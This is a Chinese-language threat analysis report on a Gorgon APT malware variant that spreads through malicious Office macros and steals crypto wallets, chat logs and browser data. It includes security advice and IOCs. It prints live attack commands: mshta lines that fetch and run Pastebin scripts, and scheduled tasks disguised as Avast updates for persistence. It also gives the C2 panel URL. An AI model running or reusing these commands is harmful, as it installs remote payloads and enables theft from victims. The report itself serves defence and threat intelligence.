背景
Gorgon APT組織是一個被認為來自巴基斯坦的攻擊組織,該組織在2018年8月份由Palo Alto Unit42團隊進行披露,主要針對全球外貿人士進行攻擊。除此之外,安全研究人員還發現Gorgon針對英國、西班牙、俄羅斯、美國等政府目標發起了攻擊,算是APT組織的後起之秀,最近一年非常活躍。
近日,深信服安全團隊發現了Gorgon APT組織最新變種樣本,此樣本釋放了一個盜取受害者虛擬幣錢包的木馬。
/攻擊流程圖/
樣本分析
1.樣本中包含惡意的巨集程式碼,如下所示:
2.通過動態除錯,巨集程式碼呼叫mshta.exe執行mshta http://bitly.com/6xdfsSXsh6,訪問短連結網址http://bitly.com/6xdfsSXsh6,如下所示:
3.短連結跳轉到網站:https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html,網站包含惡意指令碼,如下所示:
4.解密裡面的惡意指令碼,如下所示:
5.呼叫mshta.exe執行mshta.exe http://www.pastebin.com/raw/UZEbWMK9,訪問http://www.pastebin.com/raw/UZEbWMK9網站的內容,如下所示:
6.解密上面的惡意指令碼內容,如下所示:
7.呼叫cmd.exe程式,執行如下命令,結束相關程式:
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
8.將以下命令,寫入自啟動登錄檔項:
mshta.exe http://pastebin.com/raw/hJjQuQv1
9.通過命令,建立兩個計劃任務啟動項Avast Updater和Avast backup,如下所示:
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/BrH6UFRc" /F
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exe http://pastebin.com/raw/nhcP3XgH" /F
10.上面三個自啟動項,分別執行三個不同的指令碼,如下所示:
http://pastebin.com/raw/hJjQuQv1
http://pastebin.com/raw/BrH6UFRc
http://pastebin.com/raw/nhcP3XgH
hJjQuQv1指令碼解密之後,如下所示:
BrH6UFRc指令碼解密之後,如下所示:
再次解密指令碼,如下所示:
11.下載https://pastebin.com/raw/dkrjWec2指令碼並執行,指令碼內容,如下所示:
解密指令碼之後,如下所示:
12.解密之後替換裡面的字串,然後載入執行,如下所示:
13.替換之後,是一個PE檔案,如下所示:
14.通過檢視這個PE檔案為NET編寫的注入程式,如下所示:
15.將PE程式注入到calc.exe程式中,下載https://pastebin.com/raw/j8mRken0指令碼內容,然後替換裡面的@!並執行,指令碼內容,如下所示:
16.解密指令碼之後也是一個PE檔案,如下所示:
17.把這個解密出來的PE程式通過上面解密出來的PE注入程式,注入到calc.exe程式中,此PE程式,盜取受害者虛擬錢包資料,例如比特幣,萊特幣等,如下所示:
18.盜取受害者聊天工具記錄,例如:Skype、Telegram等,如下所示:
19.螢幕截圖操作,如下所示:
20.獲取受害者主機相關資訊,當前IP地址或區域資訊以及磁碟檔名等,如下所示:
21.盜取受害者瀏覽器歷史記錄資訊等,如下所示:
22.遠端伺服器URL:http://216.170.126.139/Panel/10/index.php,捕獲到的資料包流量,如下所示:
23.nhcP3XgH指令碼解密之後,如下所示:
安全建議
不管攻擊者的入侵計劃是多麼的縝密,總會由於技術的限制留下些許蛛絲馬跡,譬如軟體的植入、網路流量的產生,這些痕跡可能並不足以作為APT攻擊的證據,但一旦發現,就必須提高警惕,並及時的儲存現場,通知安全相關人員,對疑似感染的主機進行隔離和檢查。同時也要注意日常防範措施,在思想上和技術上雙管齊下:
1、加強人員安全防範意識。不要開啟來歷不明的郵件附件,對於郵件附件中的檔案要謹慎執行,如發現指令碼或其他可執行檔案可先使用防毒軟體進行掃描;
2、升級office系列軟體到最新版本,不要隨意執行不可信文件中的巨集;
3、部署分層控制,實現深度網路安全防禦,構建端到端的立體安全防護網路。在網路規劃時需要充分考慮終端接入安全、內網安全防護、應用系統安全等多個維度,並根據不同的業務需求和安全等級進行合理的分割槽隔離;
4、重視網路資料、系統執行狀態的審計和分析。嚴格把控系統的訪問許可權,持續對資料流的進出進行有效的監控,及時更新安全補丁,定時進行安全配置基線的審視和系統安全風險的評估,及時發現可以行為並通過通訊線路加密、應用層安全掃描與防護、隔離等有效技術手段將可能的安全風險扼殺在搖籃裡。
IOCs
MD5:
A137185171B1176FC125A74250928933
A5DE91F73A5E75AA7E33954FD0ADDA13
E0CE8A86F85C506591BE8897C07FB626
URL:
http://bitly.com/6xdfsSXsh6
https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html
http://www.pastebin.com/raw/UZEbWMK9
http://pastebin.com/raw/hJjQuQv1
http://pastebin.com/raw/BrH6UFRc
http://pastebin.com/raw/nhcP3XgH
http://216.170.126.139/Panel/10/index.php
IP :
216.170.126.139